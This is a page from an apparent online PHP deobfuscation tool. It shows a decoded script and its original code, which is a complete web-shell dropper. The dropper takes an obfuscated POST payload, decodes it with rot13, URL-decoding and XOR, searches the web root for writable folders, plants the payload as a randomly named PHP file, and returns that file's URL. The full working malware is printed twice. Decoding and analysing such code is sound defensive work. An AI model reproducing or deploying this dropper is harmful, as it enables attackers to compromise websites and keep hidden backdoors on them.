Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php $jyzra = "gvlnrmbmwlatnmuy"; $ywjvrm = ""; foreach($_POST as $cglcpx => $zmisdb..

Decoded Output download

<?php 
$jyzra = "gvlnrmbmwlatnmuy"; 
$ywjvrm = ""; 
 
foreach($_POST as $cglcpx => $zmisdbua) 
	{ 
	if (strlen($cglcpx) == 16 and substr_count($zmisdbua, "%") > 10) 
		{ 
		yddemj($cglcpx, $zmisdbua); 
		} 
	} 
 
function yddemj($cglcpx, $bjdrrokyr) 
	{ 
	global $ywjvrm; 
	$ywjvrm = $cglcpx; 
	$bjdrrokyr = str_split(rawurldecode(str_rot13($bjdrrokyr))); 
	function yzuonku($zkwzkvh, $cglcpx) 
		{ 
		global $jyzra, $ywjvrm; 
		return $zkwzkvh ^ $jyzra[$cglcpx % strlen($jyzra) ] ^ $ywjvrm[$cglcpx % strlen($ywjvrm) ]; 
		} 
 
	$bjdrrokyr = implode("", array_map("yzuonku", array_values($bjdrrokyr) , array_keys($bjdrrokyr))); 
	$bjdrrokyr = @unserialize($bjdrrokyr); 
	if (@is_array($bjdrrokyr)) 
		{ 
		$cglcpx = array_keys($bjdrrokyr); 
		$bjdrrokyr = $bjdrrokyr[$cglcpx[0]]; 
		if ($bjdrrokyr === $cglcpx[0]) 
			{ 
			echo @serialize(Array( 
				'php' => @phpversion() , 
			)); 
			exit(); 
			} 
		  else 
			{ 
			function bcfef($wyavgvkir) 
				{ 
				static $rxnun = array(); 
				$fkgxx = glob($wyavgvkir . '/*', GLOB_ONLYDIR); 
				if (count($fkgxx) > 0) 
					{ 
					foreach($fkgxx as $wyavgvk) 
						{ 
						if (@is_writable($wyavgvk)) 
							{ 
							$rxnun[] = $wyavgvk; 
							} 
						} 
					} 
 
				foreach($fkgxx as $wyavgvkir) bcfef($wyavgvkir); 
				return $rxnun; 
				} 
 
			$amcgqayars = $_SERVER["DOCUMENT_ROOT"]; 
			$fkgxx = bcfef($amcgqayars); 
			$cglcpx = array_rand($fkgxx); 
			$zhppmzezsi = $fkgxx[$cglcpx] . "/" . substr(md5(time()) , 0, 8) . ".php"; 
			@file_put_contents($zhppmzezsi, $bjdrrokyr); 
			echo "http://" . $_SERVER["HTTP_HOST"] . substr($zhppmzezsi, strlen($amcgqayars)); 
			exit(); 
			} 
		} 
	} 
 
 ?>

Did this file decode correctly?

Original Code

<?php
$jyzra = "gvlnrmbmwlatnmuy";
$ywjvrm = "";

foreach($_POST as $cglcpx => $zmisdbua)
	{
	if (strlen($cglcpx) == 16 and substr_count($zmisdbua, "%") > 10)
		{
		yddemj($cglcpx, $zmisdbua);
		}
	}

function yddemj($cglcpx, $bjdrrokyr)
	{
	global $ywjvrm;
	$ywjvrm = $cglcpx;
	$bjdrrokyr = str_split(rawurldecode(str_rot13($bjdrrokyr)));
	function yzuonku($zkwzkvh, $cglcpx)
		{
		global $jyzra, $ywjvrm;
		return $zkwzkvh ^ $jyzra[$cglcpx % strlen($jyzra) ] ^ $ywjvrm[$cglcpx % strlen($ywjvrm) ];
		}

	$bjdrrokyr = implode("", array_map("yzuonku", array_values($bjdrrokyr) , array_keys($bjdrrokyr)));
	$bjdrrokyr = @unserialize($bjdrrokyr);
	if (@is_array($bjdrrokyr))
		{
		$cglcpx = array_keys($bjdrrokyr);
		$bjdrrokyr = $bjdrrokyr[$cglcpx[0]];
		if ($bjdrrokyr === $cglcpx[0])
			{
			echo @serialize(Array(
				'php' => @phpversion() ,
			));
			exit();
			}
		  else
			{
			function bcfef($wyavgvkir)
				{
				static $rxnun = array();
				$fkgxx = glob($wyavgvkir . '/*', GLOB_ONLYDIR);
				if (count($fkgxx) > 0)
					{
					foreach($fkgxx as $wyavgvk)
						{
						if (@is_writable($wyavgvk))
							{
							$rxnun[] = $wyavgvk;
							}
						}
					}

				foreach($fkgxx as $wyavgvkir) bcfef($wyavgvkir);
				return $rxnun;
				}

			$amcgqayars = $_SERVER["DOCUMENT_ROOT"];
			$fkgxx = bcfef($amcgqayars);
			$cglcpx = array_rand($fkgxx);
			$zhppmzezsi = $fkgxx[$cglcpx] . "/" . substr(md5(time()) , 0, 8) . ".php";
			@file_put_contents($zhppmzezsi, $bjdrrokyr);
			echo "http://" . $_SERVER["HTTP_HOST"] . substr($zhppmzezsi, strlen($amcgqayars));
			exit();
			}
		}
	}

Function Calls

None

Variables

$jyzra	gvlnrmbmwlatnmuy
$ywjvrm

Stats

MD5	f23f67a7bd16f1779e682ca71e8b5cd3
Eval Count	0
Decode Time	92 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats